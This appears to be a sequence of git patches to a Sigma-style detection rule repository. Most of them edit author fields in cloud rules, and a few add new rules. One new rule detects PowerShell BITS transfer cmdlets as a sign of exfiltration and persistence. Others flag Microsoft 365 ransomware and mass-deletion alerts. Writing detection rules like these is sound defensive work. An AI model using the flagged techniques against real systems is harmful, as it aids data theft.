a/rules/cloud/aws/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml index 5aec929c..4ee73e1a 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_created.yml @@ -1,7 +1,7 @@ title: AWS ElastiCache Security Group Created id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 description: Detects when an ElastiCache security group has been created. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 diff --git a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml index 162b7998..f5bbe106 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS ElastiCache Security Group Modified or Deleted id: 7c797da2-9cf2-4523-ba64-33b06339f0cc description: Identifies when an ElastiCache security group has been modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 diff --git a/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml index f979bfea..0b43a509 100644 --- a/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml @@ -1,7 +1,7 @@ title: AWS Route 53 Domain Transfer Lock Disabled id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. -author: Elastic, Austin Songer +author: Elastic, Austin Songer @austinsonger status: experimental date: 2021/07/22 references: diff --git a/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml index d5ec0275..80aec16d 100644 --- a/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml @@ -1,7 +1,7 @@ title: AWS Route 53 Domain Transferred to Another Account id: b056de1a-6e6e-4e40-a67e-97c9808cf41b description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. -author: Elastic, Austin Songer +author: Elastic, Austin Songer @austinsonger status: experimental date: 2021/07/22 references: diff --git a/rules/cloud/aws/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml index 7e5229d1..1670c6b6 100644 --- a/rules/cloud/aws/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws/aws_s3_data_management_tampering.yml @@ -1,7 +1,7 @@ title: AWS S3 Data Management Tampering id: 78b3756a-7804-4ef7-8555-7b9024a02e2d description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 diff --git a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml index 98906891..2e9d22f4 100644 --- a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml @@ -1,7 +1,7 @@ title: AWS STS AssumedRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml index 71ec2267..d94ae3b9 100644 --- a/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml +++ b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml @@ -1,7 +1,7 @@ title: AWS STS GetSessionToken Misuse id: b45ab1d2-712f-4f01-a751-df3826969807 description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/azure/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml index 661b25dc..a05829ea 100644 --- a/rules/cloud/azure/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Container Registry Created or Deleted id: 93e0ef48-37c8-49ed-a02c-038aab23628e description: Detects when a Container Registry is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml index d37781a6..40d0864a 100644 --- a/rules/cloud/azure/azure_firewall_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Firewall Modified or Deleted id: 512cf937-ea9b-4332-939c-4c2c94baadcd description: Identifies when a firewall is created, modified, or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml index 6fb67edb..15799e9d 100644 --- a/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Firewall Rule Collection Modified or Deleted id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index 06ece7f9..db6a8128 100644 --- a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 description: Identifies when a Keyvault Key is modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml index f019e0d4..993ed2fc 100644 --- a/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Key Vault Modified or Deleted. id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d description: Identifies when a key vault is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index f4f146af..2ae7d373 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Keyvault Secrets Modified or Deleted id: b831353c-1971-477b-abb6-2828edc3bca1 description: Identifies when secrets are modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml index 401ddb65..bf150b5a 100644 --- a/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Cluster Created or Deleted id: 9541f321-7cba-4b43-80fc-fbd1fb922808 description: Detects when a Azure Kubernetes Cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_events_deleted.yml b/rules/cloud/azure/azure_kubernetes_events_deleted.yml index b84ac76a..4a080c28 100644 --- a/rules/cloud/azure/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_events_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Events Deleted id: 225d8b09-e714-479c-a0e4-55e6f29adf35 description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml index 53ea882c..0e89293e 100644 --- a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml @@ -1,8 +1,8 @@ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 description: Identifies the deletion of Azure Kubernetes Pods. -author: Austin Songer -status: experimental +author: Austin Songer +status: experimental @austinsonger date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes diff --git a/rules/cloud/azure/azure_kubernetes_role_access.yml b/rules/cloud/azure/azure_kubernetes_role_access.yml index 74b5c4ae..39b14ad8 100644 --- a/rules/cloud/azure/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure/azure_kubernetes_role_access.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Sensitive Role Access id: 818fee0c-e0ec-4e45-824e-83e4817b0887 description: Identifies when ClusterRoles/Roles are being modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml index 8ab5492e..6e5b955a 100644 --- a/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml index 891bb4c1..f9c3cd77 100644 --- a/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Service Account Modified or Deleted id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 description: Identifies when a service account is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml index af6398a9..e9eb00af 100644 --- a/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Firewall Rule Configuration Modified or Deleted id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 description: Identifies when a Firewall Rule Configuration is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml index bea054aa..19e762ff 100644 --- a/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Point-to-site VPN Modified or Deleted id: d9557b75-267b-4b43-922f-a775e2d1f792 description: Identifies when a Point-to-site VPN is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml index fc3643fc..60d39103 100644 --- a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml index 9c075bfc..4449bb15 100644 --- a/rules/cloud/gcp/gcp_bucket_enumeration.yml +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml @@ -1,7 +1,7 @@ title: Google Cloud Storage Buckets Enumeration id: e2feb918-4e77-4608-9697-990a1aaf74c3 description: Detects when storage bucket is enumerated in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml index 416e38ab..13904bb8 100644 --- a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Storage Buckets Modified or Deleted id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 description: Detects when storage bucket is modified or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index da19b154..016a6bcb 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Firewall Modified or Deleted id: fe513c69-734c-4d4a-8548-ac5f609be82b description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/13 references: diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 3c4b43c1..b2b9e0ef 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -1,7 +1,7 @@ title: Google Full Network Traffic Packet Capture id: 980a7598-1e7f-4962-9372-2d754c930d0e description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/13 references: diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml index dcc886d4..447fd4db 100644 --- a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml +++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Service Account Disabled or Deleted id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f description: Identifies when a service account is disabled or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 9b3deb2b..f7dca8d8 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -1,7 +1,7 @@ title: Google Cloud Service Account Modified id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc description: Identifies when a service account is modified in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml index 9c2e9c01..65dfd616 100644 --- a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud VPN Tunnel Modified or Deleted id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml index 19044165..3b2a14eb 100644 --- a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml +++ b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml @@ -2,7 +2,7 @@ title: Microsoft 365 - Impossible Travel Activity id: d7eab125-5f94-43df-8710-795b80fa1189 status: experimental description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. -author: austinsonger +author: austinsonger @austinsonger date: 2020/07/06 modified: 2020/07/06 references: From 0a3e57cc12d88d4c97875cb5e0fb184c0b46f53f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 02:10:32 +0000 Subject: [PATCH 0457/1367] Update --- rules/cloud/m365/microsoft365_impossible_travel_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml index 3b2a14eb..68146567 100644 --- a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml +++ b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml @@ -2,7 +2,7 @@ title: Microsoft 365 - Impossible Travel Activity id: d7eab125-5f94-43df-8710-795b80fa1189 status: experimental description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. -author: austinsonger @austinsonger +author: Austin Songer @austinsonger date: 2020/07/06 modified: 2020/07/06 references: From 8d57ae5ffd338ed0942fc48673f55b3f2205461e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 21:57:37 -0500 Subject: [PATCH 0458/1367] Create win_susp_bitstransfer.yml --- .../win_susp_bitstransfer.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_bitstransfer.yml diff --git a/rules/windows/process_creation/win_susp_bitstransfer.yml b/rules/windows/process_creation/win_susp_bitstransfer.yml new file mode 100644 index 00000000..d385b238 --- /dev/null +++ b/rules/windows/process_creation/win_susp_bitstransfer.yml @@ -0,0 +1,32 @@ +title: Suspicious Bitstransfer via PowerShell +id: cd5c8085-4070-4e22-908d-a5b3342deb74 +status: experimental +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets +references: + - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps +tags: + - attack.exfiltration + - attack.persistence + - attack.t1197 +date: 2021/08/19 +author: +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\powershell.exe' + - '\powershell_ise.exe' + - '\pwsh.exe' + CommandLine|contains: + - 'Get-BitsTransfer' + - 'Add-BitsFile' + condition: selection +fields: + - ComputerName + - User + - CommandLine +falsepositives: + - Unknown +level: medium From 810aae5ddd2b85e9527574b36a4cec5205fac64e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 21:58:36 -0500 Subject: [PATCH 0459/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From fe0e1353e035c3c26f5c074e93eeb05453db13e1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 22:24:23 -0500 Subject: [PATCH 0460/1367] Update win_susp_bitstransfer.yml --- rules/windows/process_creation/win_susp_bitstransfer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_bitstransfer.yml b/rules/windows/process_creation/win_susp_bitstransfer.yml index d385b238..d64eb044 100644 --- a/rules/windows/process_creation/win_susp_bitstransfer.yml +++ b/rules/windows/process_creation/win_susp_bitstransfer.yml @@ -9,7 +9,7 @@ tags: - attack.persistence - attack.t1197 date: 2021/08/19 -author: +author: Austin Songer @austinsonger logsource: category: process_creation product: windows From 99fbd4ef44d7ea9d6fabb12cfb4181f6089d9fb2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:00:23 -0500 Subject: [PATCH 0461/1367] Create microsoft365_unusual_volume_of_file_deletion.yml --- ...oft365_unusual_volume_of_file_deletion.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml diff --git a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml new file mode 100644 index 00000000..82cea96d --- /dev/null +++ b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Unusual Volume of File Deletion +id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd +status: experimental +description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: Office365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Unusual volume of file deletion" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.impact + - attack.t1485 From 9b19190ea761698b02e19eaffd13419e1996da75 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:05:05 -0500 Subject: [PATCH 0462/1367] Create microsoft365_potential_ransomware_activity.yml --- ...osoft365_potential_ransomware_activity.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_potential_ransomware_activity.yml diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml new file mode 100644 index 00000000..213f0ee5 --- /dev/null +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Potential ransomware activity +id: bd132164-884a-48f1-aa2d-c6d646b04c69 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: Office365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Potential ransomware activity" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.impact + - attack.t1486 From 54bda9068501feecb226e6c417eb6dc316295b6a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:08:25 -0500 Subject: [PATCH 0463/1367] Create microsoft365_user_restricted_from_sending_email.yml --- ...365_user_restricted_from_sending_email.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml diff --git a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml new file mode 100644 index 00000000..355ee3c1 --- /dev/null +++ b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - User Restricted from Sending Email +id: ff246f56-7f24-402a-baca-b86540e3925c +status: experimental +description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: Office365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "User restricted from sending email" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - attack.t1199 From f882ebda35ca52e8f05e256119decc5a8befcd77 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 20 Aug 2021 06:08:28 +0200 Subject: [PATCH 0464/1367] fix status --- rules/cloud/azure/azure_kubernetes_pods_deleted.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml index 0e89293e..4f7d6b9b 100644 --- a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml @@ -1,8 +1,8 @@ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 description: Identifies the deletion of Azure Kubernetes Pods. -author: Austin Songer -status: experimental @austinsonger +author: Austin Songer @austinsonger +status: experimental date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes @@ -12,9 +12,10 @@ logsource: detection: selection_operation_name: properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - condition: selection_operation_name + condition: selection_operation_name level: medium tags: - attack.impact falsepositives: -- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From b89910a38a41dc5848815b01cbf22074fda69127 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:09:38 -0500 Subject: [PATCH 0465/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From bcb43cf728ecae217de87f05aac7cbad7457744b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:13:06 -0500 Subject: [PATCH 0466/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From 42fbc0cbfc88644c4a90b92879933f6327238f5f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:13:35 -0500 Subject: [PATCH 0467/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 